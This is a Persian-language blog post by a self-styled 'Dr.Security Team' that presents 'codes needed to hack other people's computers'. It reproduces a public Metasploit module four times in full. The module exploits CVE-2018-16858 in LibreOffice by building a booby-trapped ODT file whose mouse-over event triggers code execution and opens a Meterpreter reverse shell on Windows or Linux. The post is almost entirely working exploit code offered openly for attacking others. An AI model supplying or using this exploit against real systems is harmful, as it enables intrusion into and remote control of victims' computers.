توضیح تصویر
 • 98XXXXXXXXXX+
 • mynymhmd2@gmail.com
 • TEHRAN-IRAN
 • 98914XXXXXXX+
تیم دکترسکیوریتی

Dr.Security Team

Android - Windows - Linux

توضیح تصویر

اکسپلوییت حمله به سیستم عامل های لینوکس و ویندوز

***کدهای مورد نیاز برای هک کامپیوتر دیگران***

***در ادامه مطلب***

 

 

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::FILEFORMAT
 include Msf::Exploit::Powershell
 include Msf::Exploit::CmdStager

 def initialize(info = {})
  super(update_info(info,
   'Name'      => 'LibreOffice Macro Code Execution',
   'Description'  => %q{
    LibreOffice comes bundled with sample macros written in Python and
    allows the ability to bind program events to them. A macro can be tied
    to a program event by including the script that contains the macro and
    the function name to be executed. Additionally, a directory traversal
    vulnerability exists in the component that references the Python script
    to be executed. This allows a program event to execute functions from Python
    scripts relative to the path of the samples macros folder. The pydoc.py script
    included with LibreOffice contains the tempfilepager function that passes
    arguments to os.system, allowing RCE.

    This module generates an ODT file with a mouse over event that
    when triggered, will execute arbitrary code.
   },
   'License'    => MSF_LICENSE,
   'Author'     =>
   [
    'Alex Inführ', # Vulnerability discovery and PoC
    'Shelby Pace' # Metasploit Module
   ],
   'References'   =>
    [
     [ 'CVE', '2018-16858' ],
     [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
    ],
   'Platform'    => [ 'win', 'linux' ],
   'Arch'      => [ ARCH_X86, ARCH_X64 ],
   'Targets'    =>
    [
     [
      'Windows',
      {
       'Platform'    => 'win',
       'Arch'      => [ ARCH_X86, ARCH_X64 ],
       'Payload'     => 'windows/meterpreter/reverse_tcp',
       'DefaultOptions' => { 'PrependMigrate' => true }
      }
     ],
     [
      'Linux',
      {
       'Platform'    => 'linux',
       'Arch'      => [ ARCH_X86, ARCH_X64 ],
       'Payload'     => 'linux/x86/meterpreter/reverse_tcp',
       'DefaultOptions' => { 'PrependFork' => true },
       'CmdStagerFlavor' => 'printf',
      }
     ]
    ],
   'DisclosureDate' => "Oct 18, 2018",
   'DefaultTarget'  => 0
  ))

  register_options(
  [
   OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
  ])
 end

 def gen_windows_cmd
  opts =
  {
   :remove_comspec    => true,
   :method        => 'reflection',
   :encode_final_payload => true
  }
  @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
  @cmd << ' && echo'
 end

 def gen_linux_cmd
  @cmd = generate_cmdstager.first
  @cmd << ' && echo'
 end

 def gen_file(path)
  text_content = Rex::Text.rand_text_alpha(10..15)

  # file from Alex Inführ's PoC post referenced above
  fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
  libre_file = ERB.new(fodt_file).result(binding())
  libre_file
 rescue Errno::ENOENT
  fail_with(Failure::NotFound, 'Cannot find template file')
 end

 def exploit
  path = '../../../program/python-core-3.5.5/lib/pydoc.py'
  if datastore['TARGET'] == 0
   gen_windows_cmd
  elsif datastore['TARGET'] == 1
   gen_linux_cmd
  else
   fail_with(Failure::BadConfig, 'A formal target was not chosen.')
  end
  fodt_file = gen_file(path)

  file_create(fodt_file)
 end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::FILEFORMAT
 include Msf::Exploit::Powershell
 include Msf::Exploit::CmdStager

 def initialize(info = {})
  super(update_info(info,
   'Name'      => 'LibreOffice Macro Code Execution',
   'Description'  => %q{
    LibreOffice comes bundled with sample macros written in Python and
    allows the ability to bind program events to them. A macro can be tied
    to a program event by including the script that contains the macro and
    the function name to be executed. Additionally, a directory traversal
    vulnerability exists in the component that references the Python script
    to be executed. This allows a program event to execute functions from Python
    scripts relative to the path of the samples macros folder. The pydoc.py script
    included with LibreOffice contains the tempfilepager function that passes
    arguments to os.system, allowing RCE.

    This module generates an ODT file with a mouse over event that
    when triggered, will execute arbitrary code.
   },
   'License'    => MSF_LICENSE,
   'Author'     =>
   [
    'Alex Inführ', # Vulnerability discovery and PoC
    'Shelby Pace' # Metasploit Module
   ],
   'References'   =>
    [
     [ 'CVE', '2018-16858' ],
     [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
    ],
   'Platform'    => [ 'win', 'linux' ],
   'Arch'      => [ ARCH_X86, ARCH_X64 ],
   'Targets'    =>
    [
     [
      'Windows',
      {
       'Platform'    => 'win',
       'Arch'      => [ ARCH_X86, ARCH_X64 ],
       'Payload'     => 'windows/meterpreter/reverse_tcp',
       'DefaultOptions' => { 'PrependMigrate' => true }
      }
     ],
     [
      'Linux',
      {
       'Platform'    => 'linux',
       'Arch'      => [ ARCH_X86, ARCH_X64 ],
       'Payload'     => 'linux/x86/meterpreter/reverse_tcp',
       'DefaultOptions' => { 'PrependFork' => true },
       'CmdStagerFlavor' => 'printf',
      }
     ]
    ],
   'DisclosureDate' => "Oct 18, 2018",
   'DefaultTarget'  => 0
  ))

  register_options(
  [
   OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
  ])
 end

 def gen_windows_cmd
  opts =
  {
   :remove_comspec    => true,
   :method        => 'reflection',
   :encode_final_payload => true
  }
  @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
  @cmd << ' && echo'
 end

 def gen_linux_cmd
  @cmd = generate_cmdstager.first
  @cmd << ' && echo'
 end

 def gen_file(path)
  text_content = Rex::Text.rand_text_alpha(10..15)

  # file from Alex Inführ's PoC post referenced above
  fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
  libre_file = ERB.new(fodt_file).result(binding())
  libre_file
 rescue Errno::ENOENT
  fail_with(Failure::NotFound, 'Cannot find template file')
 end

 def exploit
  path = '../../../program/python-core-3.5.5/lib/pydoc.py'
  if datastore['TARGET'] == 0
   gen_windows_cmd
  elsif datastore['TARGET'] == 1
   gen_linux_cmd
  else
   fail_with(Failure::BadConfig, 'A formal target was not chosen.')
  end
  fodt_file = gen_file(path)

  file_create(fodt_file)
 end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::FILEFORMAT
 include Msf::Exploit::Powershell
 include Msf::Exploit::CmdStager

 def initialize(info = {})
  super(update_info(info,
   'Name'      => 'LibreOffice Macro Code Execution',
   'Description'  => %q{
    LibreOffice comes bundled with sample macros written in Python and
    allows the ability to bind program events to them. A macro can be tied
    to a program event by including the script that contains the macro and
    the function name to be executed. Additionally, a directory traversal
    vulnerability exists in the component that references the Python script
    to be executed. This allows a program event to execute functions from Python
    scripts relative to the path of the samples macros folder. The pydoc.py script
    included with LibreOffice contains the tempfilepager function that passes
    arguments to os.system, allowing RCE.

    This module generates an ODT file with a mouse over event that
    when triggered, will execute arbitrary code.
   },
   'License'    => MSF_LICENSE,
   'Author'     =>
   [
    'Alex Inführ', # Vulnerability discovery and PoC
    'Shelby Pace' # Metasploit Module
   ],
   'References'   =>
    [
     [ 'CVE', '2018-16858' ],
     [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
    ],
   'Platform'    => [ 'win', 'linux' ],
   'Arch'      => [ ARCH_X86, ARCH_X64 ],
   'Targets'    =>
    [
     [
      'Windows',
      {
       'Platform'    => 'win',
       'Arch'      => [ ARCH_X86, ARCH_X64 ],
       'Payload'     => 'windows/meterpreter/reverse_tcp',
       'DefaultOptions' => { 'PrependMigrate' => true }
      }
     ],
     [
      'Linux',
      {
       'Platform'    => 'linux',
       'Arch'      => [ ARCH_X86, ARCH_X64 ],
       'Payload'     => 'linux/x86/meterpreter/reverse_tcp',
       'DefaultOptions' => { 'PrependFork' => true },
       'CmdStagerFlavor' => 'printf',
      }
     ]
    ],
   'DisclosureDate' => "Oct 18, 2018",
   'DefaultTarget'  => 0
  ))

  register_options(
  [
   OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
  ])
 end

 def gen_windows_cmd
  opts =
  {
   :remove_comspec    => true,
   :method        => 'reflection',
   :encode_final_payload => true
  }
  @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
  @cmd << ' && echo'
 end

 def gen_linux_cmd
  @cmd = generate_cmdstager.first
  @cmd << ' && echo'
 end

 def gen_file(path)
  text_content = Rex::Text.rand_text_alpha(10..15)

  # file from Alex Inführ's PoC post referenced above
  fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
  libre_file = ERB.new(fodt_file).result(binding())
  libre_file
 rescue Errno::ENOENT
  fail_with(Failure::NotFound, 'Cannot find template file')
 end

 def exploit
  path = '../../../program/python-core-3.5.5/lib/pydoc.py'
  if datastore['TARGET'] == 0
   gen_windows_cmd
  elsif datastore['TARGET'] == 1
   gen_linux_cmd
  else
   fail_with(Failure::BadConfig, 'A formal target was not chosen.')
  end
  fodt_file = gen_file(path)

  file_create(fodt_file)
 end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::FILEFORMAT
 include Msf::Exploit::Powershell
 include Msf::Exploit::CmdStager

 def initialize(info = {})
  super(update_info(info,
   'Name'      => 'LibreOffice Macro Code Execution',
   'Description'  => %q{
    LibreOffice comes bundled with sample macros written in Python and
    allows the ability to bind program events to them. A macro can be tied
    to a program event by including the script that contains the macro and
    the function name to be executed. Additionally, a directory traversal
    vulnerability exists in the component that references the Python script
    to be executed. This allows a program event to execute functions from Python
    scripts relative to the path of the samples macros folder. The pydoc.py script
    included with LibreOffice contains the tempfilepager function that passes
    arguments to os.system, allowing RCE.

    This module generates an ODT file with a mouse over event that
    when triggered, will execute arbitrary code.
   },
   'License'    => MSF_LICENSE,
   'Author'     =>
   [
    'Alex Inführ', # Vulnerability discovery and PoC
    'Shelby Pace' # Metasploit Module
   ],
   'References'   =>
    [
     [ 'CVE', '2018-16858' ],
     [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
    ],
   'Platform'    => [ 'win', 'linux' ],
   'Arch'      => [ ARCH_X86, ARCH_X64 ],
   'Targets'    =>
    [
     [
      'Windows',
      {
       'Platform'    => 'win',
       'Arch'      => [ ARCH_X86, ARCH_X64 ],
       'Payload'     => 'windows/meterpreter/reverse_tcp',
       'DefaultOptions' => { 'PrependMigrate' => true }
      }
     ],
     [
      'Linux',
      {
       'Platform'    => 'linux',
       'Arch'      => [ ARCH_X86, ARCH_X64 ],
       'Payload'     => 'linux/x86/meterpreter/reverse_tcp',
       'DefaultOptions' => { 'PrependFork' => true },
       'CmdStagerFlavor' => 'printf',
      }
     ]
    ],
   'DisclosureDate' => "Oct 18, 2018",
   'DefaultTarget'  => 0
  ))

  register_options(
  [
   OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
  ])
 end

 def gen_windows_cmd
  opts =
  {
   :remove_comspec    => true,
   :method        => 'reflection',
   :encode_final_payload => true
  }
  @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
  @cmd << ' && echo'
 end

 def gen_linux_cmd
  @cmd = generate_cmdstager.first
  @cmd << ' && echo'
 end

 def gen_file(path)
  text_content = Rex::Text.rand_text_alpha(10..15)

  # file from Alex Inführ's PoC post referenced above
  fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
  libre_file = ERB.new(fodt_file).result(binding())
  libre_file
 rescue Errno::ENOENT
  fail_with(Failure::NotFound, 'Cannot find template file')
 end

 def exploit
  path = '../../../program/python-core-3.5.5/lib/pydoc.py'
  if datastore['TARGET'] == 0
   gen_windows_cmd
  elsif datastore['TARGET'] == 1
   gen_linux_cmd
  else
   fail_with(Failure::BadConfig, 'A formal target was not chosen.')
  end
  fodt_file = gen_file(path)

  file_create(fodt_file)
 end
end
 
سفارش محصول
ابتدا یکبار کدامنیتی را تعویض سپس وارد کنید
 
 
تنها امکان ارسال نظر خصوصی وجود دارد
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی
نظر شما به هیچ وجه امکان عمومی شدن در قسمت نظرات را ندارد، و تنها راه پاسخگویی به آن نیز از طریق پست الکترونیک می‌باشد. بنابراین در صورتیکه مایل به دریافت پاسخ هستید، پست الکترونیک خود را وارد کنید.